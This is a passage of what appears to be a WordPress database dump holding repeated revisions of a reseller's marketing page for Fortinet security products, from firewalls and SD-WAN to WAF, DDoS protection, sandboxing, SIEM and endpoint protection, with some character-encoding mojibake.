uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:30:51','2019-09-30 03:30:51','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3552,1,'2019-09-30 11:31:31','2019-09-30 03:31:31','<strong style=\"font-size: 2em; color: #000;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong></li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li><strong>Validated security effectiveness</strong></li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li><strong>Protect mission critical applications</strong></li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li><strong>Continuous risk assessment via automation</strong></li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li><strong>Enterprise class security management</strong></li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and 